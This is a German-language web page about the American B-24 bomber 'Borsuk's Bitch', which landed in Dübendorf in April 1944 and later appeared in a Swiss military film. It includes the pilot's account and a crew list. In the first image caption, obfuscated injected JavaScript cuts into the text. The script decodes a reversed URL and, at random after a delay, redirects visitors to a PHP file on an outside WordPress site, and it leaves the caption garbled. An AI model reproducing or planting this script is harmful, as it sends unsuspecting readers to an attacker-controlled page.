Ereignisse

Einsatz für Schweizer Militärfilm

Der Bomber mit dem Kennzeichen H6-X und dem Übernamen „Borsuk’s Bitch“ ist nach einem Einsatz über Mannheim in Dübendorf gelandet. Am 11.10.1945 nach Burtonwood zurückgekehrt.

"Borsuk`s Bitch" nach der L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung in Dübendorf. (144_1)“ width=“800″ height=“218″ /> „Borsuk`s Bitch“ nach der Landung in Dübendorf. (144_1)

Der Bomber der 8th Air Force, 453rd Bomb Group mit dem Kennzeichen H6-X und dem Übernamen „Borsuk`s Bitch“ ist nach einem Einsatz über Mannheim in Dübendorf gelandet und am 11.10.1945 nach Burtonwood zurückgekehrt. Der Pilot 1Lt Louis Scherzer erinnert sich an die Mission Dieses Flugzeug hatte dauernd grosse Probleme mit der Elektrik und kein Techniker war in der Lage herauszufinden woran es lag. Trotz der dauernden Probleme mussten wir erst eine Mission abbrechen. An diesem 25.April flogen wir unser Ziel an, als der Groupleader bekannt gab, dass unser Hauptziel wegen einer dicken Wolkendecke nicht angeflogen werden kann. Also nahmen wir Kurs auf das Ausweichziel. Plötzlich konnten wir unsere Motoren, die mit 2’450 U/min drehten nicht mehr auf die wirtschaftlicheren 1’900 bis 2’000 U/min drosseln. Wir versuchten den Hilfsgenerator zu starten, doch dies brachte auch nichts. Die hohe Drehzahl der Motoren hätte uns eigentlich nicht gestört, wenn sie dabei nicht so durstig gewesen wären. Als der Bordmechaniker und Navigator meldeten, dass der Treibstoff nicht mehr nach England reichen würde, nahmen wir Kurs in die Schweiz. Wir waren uns nicht sicher wo wir waren, als uns ein Schweizer Jäger abfing und zu einem Flugfeld geleitete. Die Maschine landete sicher in Dübendorf und wurde später in einem Schweizer Propagandafilm geflogen. Dazu wurden alle Hoheits- und Kennzeichen entfernt. Der Film sollte der Bevölkerung zeigen, wie fremde Bomber abgefangen und zur Landung gebracht wurden.

Die B-24 von 1st Lt Scherzer im neutralen Anstrich für den Schweizer Militärfilm. (143_3)

Die B-24 von 1st Lt Scherzer im neutralen Anstrich für den Schweizer Militärfilm. (143_3)


Ereignissdatum 25.4.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-10-CF
Flugzeug-Spitzname Borsuk's Bitch
Einteilung 8th Air Force, 453rd Bomb Group, 735th Squadron
Basis Old Buckenham (GB)
Auftrag Bombardierung
Einsatzziel Mannheim (D)
Rückkehr 11.10.1945 Rückkehr nach Burtonwood (GB)
Werknummer 42-64496
Kennzeichen H6-X
CH Archiv Nr. A067
US MACR Nr. 4304
Besatzung Pilot: Louis Scherzer, 1st Lt
Copilot: Lawrence C. Raff, 2nd Lt
Navigator: Robert S. Dillworth, 2nd Lt
Bombardier: William O. Smith, 2nd Lt
Engineer: Leonard E. Morgan, S/Sgt
Radio: Jerome I. Weisberg, S/Sgt
Ball Turret: John J. Sullivan, Jr., S/Sgt
Right Waist: Alphonso F. Bocchino, S/Sgt
Left Waist: Ralph R. Stokes, T/Sgt
Tail Gunner: Henry J. Scott, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer